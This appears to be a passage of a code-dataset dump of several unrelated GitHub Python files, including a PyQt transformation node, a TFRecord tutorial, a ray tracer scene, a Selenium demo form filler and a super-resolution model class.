MinBetweenNode(BinaryOperatorNode):\n def __init__(self, index):\n super().__init__(index, operations.MIN_BETWEEN)\n self.category = 'Operators'\n self.label = 'Min(A,B)'\n\n\nclass AddTransformationNode(OneInOneOutNode):\n def __init__(self, index):\n super().__init__(index)\n self.category = 'Basic operations'\n self.label = 'Add\\nTrans-\\nformation'\n self.name_ = 'Add Transformation'\n self.in_port.data_type = ('slf', 'slf 3d')\n self.out_port.data_type = ('slf geom', 'slf', 'slf 3d')\n self.filename = ''\n self.data = None\n\n self.map = None\n self.from_index = -1\n self.to_index = -1\n self.transformation = None\n\n self.name_box = None\n self.from_box = None\n self.to_box = None\n self.new_transformation = None\n self.new_options = tuple()\n\n def name(self):\n return self.name_\n\n def get_option_panel(self):\n self.new_transformation = self.transformation\n conf_box = QGroupBox('Apply coordinate transformation')\n conf_box.setStyleSheet('QGroupBox {font-size: 12px;font-weight: bold;}')\n open_button = QPushButton('Load\\nTransformation')\n open_button.setToolTip('Open a transformation config file')\n open_button.setFixedSize(105, 50)\n self.name_box = QLineEdit()\n self.name_box.setReadOnly(True)\n self.name_box.setFixedHeight(30)\n self.from_box = QComboBox()\n self.from_box.setFixedWidth(150)\n self.to_box = QComboBox()\n self.to_box.setFixedWidth(150)\n\n if self.transformation is not None:\n for label in self.new_transformation.labels:\n self.from_box.addItem(label)\n self.to_box.addItem(label)\n self.from_box.setCurrentIndex(self.from_index)\n self.to_box.setCurrentIndex(self.to_index)\n self.name_box.setText(self.filename)\n\n option_panel = QWidget()\n vlayout = QVBoxLayout()\n hlayout = QHBoxLayout()\n hlayout.addWidget(open_button)\n hlayout.addWidget(self.name_box)\n vlayout.addLayout(hlayout)\n\n hlayout = QHBoxLayout()\n hlayout.addWidget(QLabel(' Transform from'))\n hlayout.addWidget(self.from_box)\n hlayout.addWidget(QLabel('to'))\n hlayout.addWidget(self.to_box)\n hlayout.setAlignment(Qt.AlignLeft)\n vlayout.addLayout(hlayout)\n vlayout.setSpacing(15)\n conf_box.setLayout(vlayout)\n\n layout = QVBoxLayout()\n layout.addWidget(conf_box)\n option_panel.setLayout(layout)\n open_button.clicked.connect(self._open)\n option_panel.destroyed.connect(self._select)\n return option_panel\n\n def _open(self):\n filename, _ = QFileDialog.getOpenFileName(None, 'Open a transformation configuration file', '',\n 'All file (*)', QDir.currentPath(),\n options=QFileDialog.Options() | QFileDialog.DontUseNativeDialog)\n if not filename:\n return\n success, self.new_transformation = load_transformation_map(filename)\n if not success:\n QMessageBox.critical(None, 'Error', 'The configuration is not valid.', QMessageBox.Ok)\n return\n self.name_box.setText(filename)\n for label in self.new_transformation.labels:\n self.from_box.addItem(label)\n self.to_box.addItem(label)\n\n def _check(self):\n if self.new_transformation is None:\n return 0\n elif self.from_box.currentIndex() == self.to_box.currentIndex():\n QMessageBox.critical(None, 'Error', 'The two systems cannot be identical!', QMessageBox.Ok)\n return 1\n return 2\n\n def _select(self):\n from_index, to_index = self.from_box.currentIndex(), self.to_box.currentIndex()\n self.new_options = (self.new_transformation, from_index, to_index, self.name_box.text())\n\n def configure(self, check=None):\n if super().configure(self._check):\n self.transformation, self.from_index, self.to_index, self.filename = self.new_options\n self.reconfigure_downward()\n\n def save(self):\n return '|'.join([self.category, self.name(), str(self.index()),\n str(self.pos().x()), str(self.pos().y()), self.filename, str(self.from_index),\n str(self.to_index)])\n\n def load(self, options):\n filename, from_index, to_index = options\n if not filename:\n return\n try:\n with open(filename):\n pass\n except FileNotFoundError:\n self.state = Node.NOT_CONFIGURED\n return\n success, transformation = load_transformation_map(filename)\n if not success:\n self.state = Node.NOT_CONFIGURED\n return\n from_index, to_index = int(from_index), int(to_index)\n if from_index not in transformation.nodes or to_index not in transformation.nodes:\n self.state = Node.NOT_CONFIGURED\n return\n self.filename = filename\n self.transformation = transformation\n self.from_index = from_index\n self.to_index = to_index\n self.state = Node.READY\n self.update()\n\n def run(self):\n success = super().run_upward()\n if not success:\n self.fail('input failed.')\n return\n input_data = self.in_port.mother.parentItem().data\n if 'transformation' in input_data.metadata:\n self.fail('cannot re-apply transformation.')\n return\n\n trans = self.transformation.get_transformation(self.from_index, self.to_index)\n self.data = input_data.copy()\n self.data.transform_mesh(trans)\n self.data.metadata['transformation'] = trans\n self.success()\n","repo_name":"CNR-Engineering/PyTelTools","sub_path":"pyteltools/workflow/nodes_op.py","file_name":"nodes_op.py","file_ext":"py","file_size_in_byte":63692,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"41"} +{"seq_id":"791883065","text":"def dfs(level):\n global MIN, total\n if level == n:\n if MIN > total:\n MIN = total\n return\n if MIN <= total:\n return\n\n for i in range(n):\n if visited[i] == 0:\n visited[i] = 1\n total += arr[level][i]\n dfs(level+1)\n visited[i] = 0\n total -= arr[level][i]\n\nt = int(input())\nfor tc in range(1, t+1):\n n = int(input())\n arr = [list(map(int, input().split())) for _ in range(n)]\n visited = [0] * n\n MIN = 21e8\n total = 0\n dfs(0)\n print(f'#{tc} {MIN}')\n\n\n","repo_name":"moonthree/algorithm2","sub_path":"swea_lecture/13_backtracking/01_최소 생산 비용.py","file_name":"01_최소 생산 비용.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"74918574203","text":"\"\"\"\nTFRecord数据集制作\nTFRecord是TensorFlow官方推荐的一种{key,value}二进制序列化的数据集格式\n制作好后就是一个二进制的文件,使用起来更加方便\n\"\"\"\nimport tensorflow as tf\nimport numpy as np\nimport glob\nimport os\n\n\n# tf.Example中可以使用以下几种格式:\n# tf.train.BytesList: 可以使用的类型包括 string和byte\n# tf.train.FloatList: 可以使用的类型包括 float和double\n# tf.train.Int64List: 可以使用的类型包括 enum,bool, int32, uint32, int64\n\n# 字节格式\ndef _bytes_feature(value):\n \"\"\"Returns a bytes_list from a string/byte.\"\"\"\n if isinstance(value, type(tf.constant(0))):\n # BytesList won't unpack a string from an EagerTensor.\n value = value.numpy()\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n\n# 浮点数\ndef _float_feature(value):\n \"\"\"Return a float_list form a float/double.\"\"\"\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n\n# 整数\ndef _int64_feature(value):\n \"\"\"Return a int64_list from a bool/enum/int/uint.\"\"\"\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n\n# 创建一个TFRecord数据集样本\ndef serialize_example(feature0, feature1, feature2, feature3):\n \"\"\"\n 创建tf.Example\n \"\"\"\n\n # 转换成相应类型\n feature = {\n # 官方例子上好像有坑,这里不接受numpy.bool_的格式,要强制转成bool下\n 'feature0': _int64_feature(bool(feature0)),\n 'feature1': _int64_feature(feature1),\n 'feature2': _bytes_feature(feature2),\n 'feature3': _float_feature(feature3),\n }\n # 使用tf.train.Example来创建\n example_proto = tf.train.Example(features=tf.train.Features(feature=feature))\n # SerializeToString方法转换为二进制字符串\n return example_proto.SerializeToString()\n\n\n# 数据量\nn_observations = int(1e4)\n# bool型特征\nfeature0 = np.random.choice([False, True], n_observations)\n# 整数特征\nfeature1 = np.random.randint(0, 5, n_observations)\n# 字符串特征,字符串用字节的形式表示\nstrings = np.array([b'cat', b'dog', b'chicken', b'horse', b'goat'])\nfeature2 = strings[feature1]\n# 浮点数特征\nfeature3 = np.random.randn(n_observations)\n\n# TFRecord数据集名称\nfilename = 'tfrecord_test'\n# 生成一个TFRecord数据集\nwith tf.io.TFRecordWriter(filename) as writer:\n for i in range(n_observations):\n example = serialize_example(feature0[i], feature1[i], feature2[i], feature3[i])\n writer.write(example)\n\n# 读取TFRecord数据集\nfilenames = [filename]\nraw_dataset = tf.data.TFRecordDataset(filenames)\nprint(raw_dataset)\n\n# 实际去制作一个图像的TFRecord数据集\n# 标签\nimage_labels = {\n 'dog': 0,\n 'kangaroo': 1,\n}\n# 读数据,binary格式\nimage_string = open('./data/tfrecord_source/dog.jpg', 'rb').read()\nlabel = image_labels['dog']\n\n\n# 创建图像数据的Example\ndef image_example(image_string, label):\n image_shape = tf.image.decode_jpeg(image_string).shape\n\n feature = {\n 'height': _int64_feature(image_shape[0]),\n 'width': _int64_feature(image_shape[1]),\n 'depth': _int64_feature(image_shape[2]),\n 'label': _int64_feature(label),\n 'image_raw': _bytes_feature(image_string),\n }\n\n return tf.train.Example(features=tf.train.Features(feature=feature))\n\n\n# 打印部分信息出来看看Example里是些啥\nimage_example_proto = image_example(image_string, label)\nfor line in str(image_example_proto).split('\\n')[:15]:\n print(line)\n\n# 制作 `images.tfrecords`数据集\nimage_path = './data/tfrecord_source/'\nimages = glob.glob(image_path + '*.jpg')\nrecord_file = 'images.tfrecord'\ncounter = 0\n\nwith tf.io.TFRecordWriter(record_file) as writer:\n for fname in images:\n with open(fname, 'rb') as f:\n image_string = f.read()\n label = image_labels[os.path.basename(fname).replace('.jpg', '')]\n\n # 生成一个`tf.Example`\n tf_example = image_example(image_string, label)\n\n # 将`tf.example` 写入 TFRecord\n writer.write(tf_example.SerializeToString())\n\n counter += 1\n print('Processed {:d} of {:d} images.'.format(\n counter, len(images)))\n\nprint(' Wrote {} images to {}'.format(counter, record_file))\n\n# 加载一个制作好的TFRecord\nraw_train_dataset = tf.data.TFRecordDataset('images.tfrecord')\n\n# 因为之前制作的时候Example都是进过序列化了的,那么使用之前还要解析一下\n# tf.io.parse_single_example(example_proto, feature_description)函数可以解析单条example\n\n# 解析的格式需要跟之前创建example时一致\nimage_feature_description = {\n 'height': tf.io.FixedLenFeature([], tf.int64),\n 'width': tf.io.FixedLenFeature([], tf.int64),\n 'depth': tf.io.FixedLenFeature([], tf.int64),\n 'label': tf.io.FixedLenFeature([], tf.int64),\n 'image_raw': tf.io.FixedLenFeature([], tf.string),\n}\n\n\n# 解析函数\ndef parse_tf_example(example_proto):\n # 解析Example\n parsed_example = tf.io.parse_single_example(example_proto, image_feature_description)\n\n # 预处理\n x_train = tf.image.decode_jpeg(parsed_example['image_raw'], channels=3)\n x_train = tf.image.resize(x_train, (416, 416))\n x_train /= 255.\n\n label_y = parsed_example['label']\n y_train = label_y\n\n return x_train, y_train\n\n\n# 解析后的数据集\ntrain_dataset = raw_train_dataset.map(parse_tf_example)\n\n# 制作成训练集\ntrain_ds = train_dataset.shuffle(buffer_size=10000).batch(2).repeat(10)\n# 打印出来看看\nfor batch, (x, y) in enumerate(train_ds):\n print(batch, x.shape, y)\n","repo_name":"lj502766817/DP_Learn","sub_path":"TF/other/TFRecord_demo.py","file_name":"TFRecord_demo.py","file_ext":"py","file_size_in_byte":5647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"35576205911","text":"\"\"\"The scene is the collection of objects, camera and lights to be rendered\"\"\"\nimport math\nfrom typing import List, Tuple\n\nimport colors\nimport intersections\nimport lights\nimport points\nimport rays\nimport shapes\n\nclass Scene:\n \"\"\"The scene is the collection of objects, light and camera that constitutes\n an image\n \"\"\"\n\n def __init__(self, objects: List[shapes.Shape]=None,\n lights: List[lights.Light]=None,\n recursion_limit: int=5) -> None:\n\n if objects is None:\n self.objects = []\n else:\n self.objects = objects\n\n if lights is None:\n self.lights = []\n else:\n self.lights = lights\n\n self.recursion_limit = recursion_limit\n\n\n def add_object(self, shape: shapes.Shape):\n \"\"\"Add an object to the scene\"\"\"\n self.objects.append(shape)\n\n\n def intersect(self, r: rays.Ray) -> intersections.Intersections:\n \"\"\"Intersect the ray r with all the objects in the scene and return\n intersections sotred by t value\n \"\"\"\n\n for i, shape in enumerate(self.objects):\n if i == 0:\n all_intersections = shape.intersect(r)\n else:\n all_intersections += shape.intersect(r)\n\n return all_intersections\n\n\n def shade_hit(self,\n computations: intersections.Computations,\n remaining=5) -> Tuple[colors.Color, int]:\n \"\"\"Given some pre-calculated values about a hit, calculate its color\"\"\"\n\n surface = colors.Color(0, 0, 0)\n\n for light in self.lights:\n\n in_shadow = self.is_shadowed(computations.over_point, light)\n\n surface += computations.object.material.lighting(light,\n computations.over_point, computations.eyev,\n computations.normalv, in_shadow = in_shadow)\n\n reflected, _ = self.reflected_color(computations,\n remaining=remaining)\n refracted, _ = self.refracted_color(computations,\n remaining=remaining)\n\n material = computations.object.material\n if material.reflective > 0 and material.transparency > 0:\n reflectance = computations.schlick\n return (surface +\n reflected * reflectance +\n refracted * (1 - reflectance), remaining)\n\n return surface + reflected + refracted, remaining\n\n def color_at(self, ray: rays.Ray, remaining=25) -> Tuple[colors.Color, int]:\n \"\"\"Calculates the color of a ray in the scene\"\"\"\n\n # List out all the surfaces the ray intersects\n ray_intersections = self.intersect(ray)\n\n # Find the closest one, in front of the camera (the \"hit\"):\n hit = ray_intersections.hit()\n\n # If there were no hits, return the background color\n if hit is None:\n return colors.Color(0, 0, 0), remaining\n\n # Else, calculate the color of the pixel\n precomputes = hit.precompute(ray, all_intersections=ray_intersections)\n return self.shade_hit(precomputes, remaining=remaining)\n\n def is_shadowed(self, point: points.Point, light: lights.Light) -> bool:\n \"\"\"Returns True if the point is shadowed from the light\"\"\"\n\n v = light.position - point\n distance = v.magnitude()\n direction = v.normalize()\n\n ray = rays.Ray(point, direction)\n intersections = self.intersect(ray)\n\n hit = intersections.hit()\n\n if hit is not None and hit.t < distance:\n return True\n\n return False\n\n def reflected_color(self,\n precomputes: intersections.Computations,\n remaining: int=5) -> Tuple[colors.Color, int]:\n \"\"\"Calculate the reflected color of a hit on a surface.\n\n remaining tracks how many levels of recursion we have done, and when\n it is zero, simply returns black\n \"\"\"\n if remaining == 0:\n # If we have gone too far down the recursion stack, just return\n # black\n return colors.Color(0, 0, 0), 0\n\n if precomputes.object.material.reflective == 0:\n # If the material is not reflective, return black\n return colors.Color(0, 0, 0), 0\n\n # Fire a new ray from the intersection point at the reflection angle\n reflect_ray = rays.Ray(precomputes.over_point, precomputes.reflectv)\n\n remaining -= 1\n\n color, remaining = self.color_at(reflect_ray, remaining=remaining)\n return color * precomputes.object.material.reflective, remaining\n\n\n def refracted_color(self,\n precomputes: intersections.Computations,\n remaining: int=5) -> Tuple[colors.Color, int]:\n \"\"\"Calculate the refracted color of a hit on a surface.\n\n remaining tracks how many levels of recursion we have done, and when\n it is zero, simply returns black\n \"\"\"\n\n if remaining == 0:\n # If we have gone too far down the recursion stack, just return\n # black\n return colors.Color(0, 0, 0), remaining\n\n if precomputes.object.material.transparency == 0:\n # If the material is not transparent, return black\n return colors.Color(0, 0, 0), remaining\n\n # Check for total internal refraction\n n_ratio = precomputes.n1 / precomputes.n2\n cos_i = precomputes.eyev.dot(precomputes.normalv)\n sin2_t = n_ratio ** 2 * (1 - cos_i ** 2)\n if sin2_t > 1:\n return colors.Color(0, 0, 0), remaining\n\n cos_t = math.sqrt(1.0 - sin2_t)\n\n direction = (precomputes.normalv * (n_ratio * cos_i - cos_t) -\n precomputes.eyev * n_ratio)\n\n refract_ray = rays.Ray(precomputes.under_point, direction)\n\n color = (self.color_at(refract_ray, remaining-1)[0] *\n precomputes.object.material.transparency)\n\n return color, remaining\n","repo_name":"craigmbooth/raytracer","sub_path":"raytracer/scenes.py","file_name":"scenes.py","file_ext":"py","file_size_in_byte":6070,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"9632310002","text":"# Importação da biblioteca Selenium\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.service import Service\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport time\nimport os\n\n\n\ndados = {\n 'email': 'rdr@gmail.com',\n 'cpf': 12365498798,\n 'senha': 'rdr123'\n}\nos.system(\"cls\")\nprint(\"Iniciando nosso robô...\")\n\n# Instanciando o Selenium\nurl = webdriver.Chrome()\n\n# abre página\nurl.get('https://rdralves.github.io/home/')\n\n# preencher email\nurl.find_element(By.XPATH, '//*[@id=\"exampleInputEmail1\"]').send_keys(dados['email'])\ntime.sleep(0.5)\n\n# preenche cpf\nurl.find_element(By.XPATH, '//*[@id=\"exampleInputCPF\"]').send_keys(dados['cpf'])\ntime.sleep(0.5)\n\n# peenche senha\nurl.find_element(\n By.XPATH, '//*[@id=\"exampleInputPassword1\"]').send_keys(dados['senha'])\ntime.sleep(0.5)\n\n# clica no botão Enviar\nurl.find_element(By.XPATH, '/html/body/div/form/button').click()\ntime.sleep(0.5)\n\n# finalizado o robo\nprint('Missão cumprinda...')","repo_name":"rdralves/Web_Scraping","sub_path":"projeto2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"34269040662","text":"from __future__ import absolute_import\nfrom datetime import datetime\nimport logging\n\nfrom bson import ObjectId\nfrom pylru import lrucache\n\nfrom context import __version__\nfrom context.data.base import Base\nfrom context.settings import DATA_CACHE_SIZE_CONTEXT\n\n\nclass Context(Base):\n LOGGER = logging.getLogger(__name__)\n collection_name = \"context\"\n cache = lrucache(DATA_CACHE_SIZE_CONTEXT)\n\n def get(self, _id, _rev):\n if _id in self.cache and self.cache[_id][\"_rev\"] == _rev:\n return self.cache[_id]\n else:\n data = next(self.collection.find({\"_id\": _id}), None)\n self.cache[_id] = data\n return data\n\n def insert(self, entities, locale, new_context_id, application_id,\n session_id, user_id, now=None):\n \"\"\"\n\n :type user_id: ObjectId\n :type session_id: ObjectId\n :type application_id: ObjectId\n :type new_context_id: ObjectId\n :type locale: str\n :type entities: list\n \"\"\"\n if now is None:\n now = datetime.now()\n\n record = {\n \"_id\": new_context_id,\n \"entities\": entities,\n \"session_id\": session_id,\n \"locale\": locale,\n \"created\": now.isoformat(),\n \"application_id\": application_id,\n \"version\": __version__,\n \"_rev\": new_context_id\n }\n if user_id is not None:\n record[\"user_id\"] = user_id\n\n self.collection.insert(record)\n self.cache[new_context_id] = record\n\n return {\n \"_id\": new_context_id,\n \"_rev\": new_context_id\n }\n\n def update(self, context_id, _rev, entities=None, unsupported_entities=None, now=None):\n\n \"\"\"\n\n :rtype : ObjectId\n :type now: datetime\n :type entities: list\n :type _rev: ObjectId\n :type context_id: ObjectId\n \"\"\"\n now = datetime.now() if now is None else now\n set_data = {\n \"_rev\": _rev,\n \"updated\": now.isoformat()\n }\n if entities is not None:\n set_data[\"entities\"] = entities\n\n set_data[\"unsupported_entities\"] = unsupported_entities if unsupported_entities is not None else {}\n\n self.collection.update(\n {\n \"_id\": context_id\n },\n {\n \"$set\": set_data\n }\n )\n\n if context_id in self.cache:\n self.cache[context_id][\"entities\"] = entities\n self.cache[context_id][\"_rev\"] = _rev\n self.cache[context_id][\"updated\"] = now.isoformat()\n\n return _rev\n","repo_name":"robdefeo/context","sub_path":"context/data/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"20630380299","text":"\"\"\"\nThis module provides functions to compute various interesting metrics of the Safe Curve G(alpha)\n\"\"\"\n\nimport torch\nimport numpy as np\n\n\ndef compute_metric(\n score_id_val,\n score_id_test,\n score_ood_test,\n logits_id_val,\n labels_id_val,\n logits_id_test,\n labels_id_test,\n logits_ood_test=None,\n labels_ood_test=None,\n metrics=[\"quantile_95\"],\n):\n \"\"\"\n Returns a dictionary of different queried metrics\n Arguments:\n - scores_id_val: numpy array of scores on in distribution data (validation set)\n - scores_id_test: numpy array of scores on in distribution data (test set)\n - scores_ood_test: numpy array of scores on ood data\n - data_id_val: input data from training distribution (i.e. features of classifier)\n - logits_id_val: logits of classifier on id validation set\n - labels_id_val: ground truth labels on id validation set\n - data_id_test: input data from id test distribution (i.e. features of classifier)\n - logits_id_test: logits of classifier on id test set\n - labels_id_test: ground truth labels on id id set\n - data_ood_test: input data from test distribution (i.e. features of classifier)\n - logits_ood_test: logits of classifier on data_test\n - labels_ood_test: ground truth labels for data_test\n - metrics: list of metrics that evaluate safe region\n - num_alphas: amount of quantiles on which metrics are computed\n - ece_bins: number of bins to compute ece\n Return:\n - out: dictionary with (a) name of metric as key and (b) computed value of this metric\n \"\"\"\n\n if logits_ood_test is None or labels_ood_test is None:\n ood_prediction = False\n else:\n ood_prediction = True\n\n possible_metrics = [\n \"accuracy\", # accuracy on data sets\n \"quantile_95\", # 95 percentile\n ]\n assert all(metric in possible_metrics for metric in metrics)\n\n # Compute true-false values on id val data\n true_false_id_val = (\n (torch.from_numpy(logits_id_val).argmax(1) == torch.from_numpy(labels_id_val))\n .float()\n .cpu()\n .view(-1)\n .numpy()\n )\n\n # Compute true-false values on id test data\n true_false_id_test = (\n (torch.from_numpy(logits_id_test).argmax(1) == torch.from_numpy(labels_id_test))\n .float()\n .cpu()\n .view(-1)\n .numpy()\n )\n\n # Compute accuracy on validation, test and ood data\n accuracy_id_val = np.sum(true_false_id_val) / true_false_id_val.shape[0]\n accuracy_id_test = np.sum(true_false_id_test) / true_false_id_test.shape[0]\n\n if ood_prediction:\n # Compute true-false values on ood test data\n true_false_ood_test = (\n (\n torch.from_numpy(logits_ood_test).argmax(1)\n == torch.from_numpy(labels_ood_test)\n )\n .float()\n .cpu()\n .view(-1)\n .numpy()\n )\n accuracy_ood_test = np.sum(true_false_ood_test) / true_false_ood_test.shape[0]\n\n # Output dictionary\n out = {}\n\n if \"accuracy\" in metrics:\n out[\"acc_id_test\"] = accuracy_id_test\n out[\"acc_id_val\"] = accuracy_id_val\n if ood_prediction:\n out[\"acc_ood_test\"] = accuracy_ood_test\n\n # Compute 95 percentile where the 95 percentile is defined on the id val data\n if \"quantile_95\" in metrics:\n qs = np.quantile(score_id_val, 0.95)\n\n if ood_prediction:\n mask = torch.from_numpy(score_ood_test) < qs\n out[\"n_95_frac_ood\"] = mask.sum().item() / logits_ood_test.shape[0]\n out[\"n_95_ood\"] = (\n (\n torch.from_numpy(logits_ood_test[mask]).argmax(1)\n == torch.from_numpy(labels_ood_test[mask])\n ).sum()\n / mask.sum()\n ).item()\n\n mask = torch.from_numpy(score_id_test) < qs\n out[\"n_95_frac_id_test\"] = mask.sum().item() / logits_id_test.shape[0]\n out[\"n_95_id_test\"] = (\n (\n torch.from_numpy(logits_id_test[mask]).argmax(1)\n == torch.from_numpy(labels_id_test[mask])\n ).sum()\n / mask.sum()\n ).item()\n\n return out\n","repo_name":"XarwinM/competence_estimation","sub_path":"competence_estimation/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":4262,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"41"} +{"seq_id":"9503224793","text":"import terminalio as tio\nimport displayio as dpio\nimport adafruit_imageload as imgload\n\n# tio.Terminal does not accept subclass of TileGrid, so we cannot maek TileGrid as a base class.\n# Also, it seems not possible to subclass tio.Terminal.\n\nclass RictyTerminal (dpio.Group):\n Bitmap, Palette = imgload.load(\"font/RictyBold.bmp\")\n\n def __init__(self, width, height) :\n super().__init__()\n self.tg = dpio.TileGrid(self.Bitmap, pixel_shader = self.Palette,\n width = width, height = height,\n tile_width = 10, tile_height = 20)\n self.term = tio.Terminal(self.tg, tio.FONT)\n self.append(self.tg)\n self.width = width\n self.height = height\n\n def write(self, txt) :\n return self.term.write(txt)\n\nclass RictyHTerminal (dpio.Group):\n Bitmap, Palette = imgload.load(\"font/RictyBoldH.bmp\")\n Table = dict(zip(\" っまみむめもらりるれろ、ー。わ0123456789・!やゆよ?をがぎぐげござじずぜぞだぢづでどばびぶべぼぱぴぷぺぽ〜「ん」ゃゅょあいうえおかきくけこさしすせそたちつてとなにぬねのはひふへほ\",\n \"\"\" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\"\"\"))\n\n def __init__(self, width, height) :\n super().__init__()\n self.tg = dpio.TileGrid(self.Bitmap, pixel_shader = self.Palette,\n width = width, height = height,\n tile_width = 20, tile_height = 20)\n self.term = tio.Terminal(self.tg, tio.FONT)\n self.append(self.tg)\n \n def write(self, txt) :\n txt = \"\".join(self.Table.get(x, x) for x in txt)\n return self.term.write(txt)\n \n","repo_name":"t-ikegami/WioTerminal-CircuitPython","sub_path":"libsrc/RictyBoldTerminal.py","file_name":"RictyBoldTerminal.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"41"} +{"seq_id":"32553073618","text":"from collections import OrderedDict\nimport torch\nimport torch.nn.functional as F\nfrom torch.optim import lr_scheduler\nimport models.networks as networks\nfrom .base_model import BaseModel\nimport math\nimport os\n\n\nclass HyperRIMModel(BaseModel):\n def __init__(self, opt):\n super(HyperRIMModel, self).__init__(opt)\n train_opt = opt['train']\n\n # define networks and load pretrained models\n self.netG = networks.define_G(opt).to(self.device)\n if self.is_train:\n self.netG.train()\n self.load()\n # store the number of levels and code channel\n self.num_levels = int(math.log(opt['scale'], 2))\n self.code_nc = opt['network_G']['code_nc']\n self.map_nc = opt['network_G']['map_nc']\n\n # define losses, optimizer and scheduler\n self.netF = networks.define_F(opt).to(self.device)\n self.projections = None\n if self.is_train:\n # G\n wd_G = train_opt['weight_decay_G'] if train_opt['weight_decay_G'] else 0\n map_network_params = []\n core_network_params = []\n # can freeze weights for any of the levels\n freeze_level = train_opt['freeze_level']\n for k, v in self.netG.named_parameters():\n if v.requires_grad:\n if freeze_level:\n if \"level_%d\" % freeze_level not in k:\n if 'map' in k:\n map_network_params.append(v)\n else:\n core_network_params.append(v)\n else:\n if 'map' in k:\n map_network_params.append(v)\n else:\n core_network_params.append(v)\n else:\n print('WARNING: params [{:s}] will not optimize.'.format(k))\n self.optimizer_G = torch.optim.Adam([{'params': core_network_params},\n {'params': map_network_params, 'lr': 1e-2 * train_opt['lr_G']}],\n lr=train_opt['lr_G'], weight_decay=wd_G,\n betas=(train_opt['beta1_G'], 0.999))\n self.optimizers.append(self.optimizer_G)\n # for resume training - load the previous optimizer stats\n self.load_optimizer()\n\n # schedulers\n if train_opt['lr_scheme'] == 'MultiStepLR':\n for optimizer in self.optimizers:\n self.schedulers.append(lr_scheduler.MultiStepLR(optimizer, train_opt['lr_steps'],\n train_opt['lr_gamma']))\n else:\n raise NotImplementedError('MultiStepLR learning rate scheme is enough.')\n\n self.log_dict = OrderedDict()\n\n print('---------- Model initialized ------------------')\n self.print_network()\n print('-----------------------------------------------')\n\n def feed_data(self, data, code=[], need_HR=True):\n self.lr = data['LR'].to(self.device)\n self.code = code\n if need_HR: # train or val\n self.targets = dict()\n # only feed the images, not their paths\n for key, val in data.items():\n if ('HR' in key or 'D' in key) and 'path' not in key:\n self.targets[key] = val.to(self.device)\n\n # Generate random code input at specified level (if left empty, then generate code for all levels)\n def gen_code(self, bs, w, h, levels=[], tensor_type=torch.randn):\n gen_levels = levels if levels != [] else range(self.num_levels)\n out_code = []\n for i in gen_levels:\n out_code.append(tensor_type(bs, self.map_nc + self.code_nc * w * (2 ** i) * h * (2 ** i)).to(self.device))\n return out_code\n\n # Random projection matrix for reducing LPIPS feature dimension\n def init_projection(self, h, total_dim=1000):\n # default to h == w\n fake_input = torch.zeros(1, 3, h, h)\n fake_feat, fake_shape = self.netF(fake_input)\n self.projections = []\n dim_per_layer = int(total_dim * 1. / len(fake_feat))\n for feat in fake_feat:\n self.projections.append(F.normalize(torch.randn(feat.shape[1], dim_per_layer), p=2, dim=1).to(self.device))\n\n def clear_projection(self):\n self.projections = None\n\n def _get_target_at_level(self, level):\n for key, val in self.targets.items():\n if str(level + 1) in key and 'path' not in key:\n return val\n return self.targets['HR']\n\n def compute_feature_loss(self, gen_feat, real_feat, gen_shape):\n # compute l2 feature loss given features\n result = 0\n for i, g_feat in enumerate(gen_feat):\n cur_diff = torch.sum((g_feat - real_feat[i]) ** 2, dim=1) / (gen_shape[i] ** 2)\n result += cur_diff\n return result\n\n def get_features(self, level=-1):\n '''\n Assuming the generated features are for the same LR input, therefore just one pass for the target feature\n '''\n self.netG.eval()\n out_dict = OrderedDict()\n with torch.no_grad():\n gen_imgs = self.netG(self.lr, self.code)\n gen_feat, gen_shape = self.netF(gen_imgs[level])\n real_feat, real_shape = self.netF(self._get_target_at_level(level))\n gen_features = []\n real_features = []\n # random projection\n for i, g_feat in enumerate(gen_feat):\n proj_gen_feat = torch.mm(g_feat, self.projections[i])\n proj_real_feat = torch.mm(real_feat[i], self.projections[i])\n gen_features.append(proj_gen_feat / gen_shape[i])\n real_features.append(proj_real_feat / gen_shape[i])\n gen_features = torch.cat(gen_features, dim=1)\n real_features = torch.cat(real_features, dim=1)\n\n out_dict['gen_feat'] = gen_features\n out_dict['real_feat'] = real_features\n\n self.netG.train()\n return out_dict\n\n def get_loss(self, level=-1):\n self.netG.eval()\n with torch.no_grad():\n gen_imgs = self.netG(self.lr, self.code)\n gen_feat, gen_shape = self.netF(gen_imgs[level])\n real_feat, real_shape = self.netF(self._get_target_at_level(level))\n result = self.compute_feature_loss(gen_feat, real_feat, gen_shape)\n self.netG.train()\n return result\n\n def optimize_parameters(self, step, inter_supervision=False):\n torch.autograd.set_detect_anomaly(True)\n self.optimizer_G.zero_grad()\n # intermediate supervision adds loss from intermediate resolutions\n if inter_supervision:\n outputs = self.netG(self.lr, self.code)\n l_g_total = 0.\n for i, output in enumerate(outputs):\n gen_feat, gen_shape = self.netF(output)\n real_feat, real_shape = self.netF(self._get_target_at_level(i))\n l_g_total += self.compute_feature_loss(gen_feat, real_feat, gen_shape)\n else:\n outputs = self.netG(self.lr, self.code)\n l_g_total = 0.\n gen_feat, gen_shape = self.netF(outputs[-1])\n real_feat, real_shape = self.netF(self._get_target_at_level(-1))\n 